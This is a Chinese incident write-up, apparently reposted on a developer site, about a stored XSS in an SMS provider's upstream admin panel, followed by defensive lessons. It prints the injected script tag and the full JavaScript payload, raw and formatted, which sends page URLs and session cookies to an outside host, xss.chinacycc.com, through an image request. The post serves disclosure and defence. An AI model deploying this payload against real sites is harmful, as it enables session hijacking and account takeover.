记一次 XSS 漏洞发现过程

栏目: 编程工具 · 发布时间: 5年前

内容简介:某用户委托安全公司对本司(SendCloud)短信发送业务做安全检测,发现咱们的上游通道某一环节的安全漏洞。跟踪这个过程,真的十分有趣。这是 XSS 第一次发生在我身边,怎么也不会想到有人会犯这么弱智的错误。最基本的页面输出转义都没做。

某用户委托安全公司对本司(SendCloud)短信发送业务做安全检测,发现咱们的上游通道某一环节的安全漏洞。

跟踪这个过程,真的十分有趣。

这是 XSS 第一次发生在我身边,怎么也不会想到有人会犯这么弱智的错误。最基本的页面输出转义都没做。

页面内容输出转义、 SQL 防注入、表单的 CSRF token 校验,应该算是 Web 站点搭建的基础工作吧!

过程

记一次 XSS 漏洞发现过程

  1. 用户通过我们的短信服务往安全公司指定手机号推送消息
  2. 安全公司回复以下内容(会经过运营商反馈给通道):

    html <script src=https://xss.chinacycc.com/EDQmSg?1554797849></script>

  3. 上游通道后台管理页面未做处理,admin 用户登录之后,查看短信回复内容页面时,页面直接输出了回复内容,导致 XSS —— 站外不安全脚本被加载执行。

  4. 脚本获取重要信息( document.location.hreftop.location.hrefdocument.cookiewindow.opener.location.href ),发送给指定地址。
  5. 安全公司利用 Cookie 直接就访问了上游通道的后台,而且还是最高权限。

...

记一次 XSS 漏洞发现过程 记一次 XSS 漏洞发现过程

我们利用用户反馈过来的这段信息,同样登录了这个后台,确认后台真的加载了这段 JS。

记一次 XSS 漏洞发现过程

估计是框架拦截请求,采用 jquery 加载,还加上了时间戳。

记一次 XSS 漏洞发现过程

请求伪造了一个图片请求用于上传数据。

记一次 XSS 漏洞发现过程

经验与教训

  1. 自身业务安全性之外,应该经常做全链路的业务安全性检测,不能让用户对我们的业务安全性产生质疑。
    数据泄露真的是太严重了,如果是恶意的,那...
    之前没人注意到这个问题,是更可怕的事情。
  2. 我就在中网讯通后台这么闲逛,他们就是没有任何感觉(我们已经通过正常途径在通知他们了)。
    除了基础的防范手段之外,应该:
    1. 管理后台尽量不要暴露到公网
    2. 尽量一个用户只允许在一个地方登录
    3. 记录用户登录信息,连用户账号的认证错误都记下来
    4. 将 IP、UserAgent 等指纹数据和 SESSION ID 关联起来,除了使用 SESSION ID 检验之外,还应该判断这些指纹数据能不能匹配得上。(好像淘宝网,还是哪里,有一个 JS 专门用来计算 B 端指纹,对反爬也有帮助)
    5. 对管理后台的疑似非正常登录(不是之前常用 IP,浏览器等)应该有告警,并立即处理。
    6. ...先就说这么多吧

附:脚本

(function(){(new Image()).src='http://xss.chinacycc.com/index.php?do=api&id=EDQmSg&location='+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})());})();
if(''==1){keep=new Image();keep.src='https://xss.chinacycc.com/index.php?do=keepsession&id=EDQmSg&url='+escape(document.location)+'&cookie='+escape(document.cookie)};

格式化之后

(function() {
  (new Image()).src = 'http://xss.chinacycc.com/index.php?do=api&id=EDQmSg&location=' + escape((function() {
    try {
      return document.location.href
    } catch(e) {
      return ''
    }
  })()) + '&toplocation=' + escape((function() {
    try {
      return top.location.href
    } catch(e) {
      return ''
    }
  })()) + '&cookie=' + escape((function() {
    try {
      return document.cookie
    } catch(e) {
      return ''
    }
  })()) + '&opener=' + escape((function() {
    try {
      return (window.opener && window.opener.location.href) ? window.opener.location.href: ''
    } catch(e) {
      return ''
    }
  })());
})();
if ('' == 1) {
  keep = new Image();
  keep.src = 'https://xss.chinacycc.com/index.php?do=keepsession&id=EDQmSg&url=' + escape(document.location) + '&cookie=' + escape(document.cookie)
};

以上所述就是小编给大家介绍的《记一次 XSS 漏洞发现过程》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

网站运维技术与实践

网站运维技术与实践

饶琛琳 / 电子工业出版社 / 2014-3 / 69.00元

网站运维工作,一向以内容繁杂、覆盖面广著称。《网站运维技术与实践》选取日常工作涉及的监测调优、日志分析、集群规划、自动化部署、存储和数据库等方面,力图深入阐述各项工作的技术要点及协议原理,并介绍相关开源产品的实践经验。在技术之外,作者也分享了一些关于高效工作及个人成长方面的心得。 《网站运维技术与实践》适合Linux 系统管理员、中大型网站运维工程师及技术负责人、DevOps 爱好者阅读。同......一起来看看 《网站运维技术与实践》 这本书的介绍吧!

Markdown 在线编辑器
Markdown 在线编辑器

Markdown 在线编辑器

UNIX 时间戳转换
UNIX 时间戳转换

UNIX 时间戳转换

RGB CMYK 转换工具
RGB CMYK 转换工具

RGB CMYK 互转工具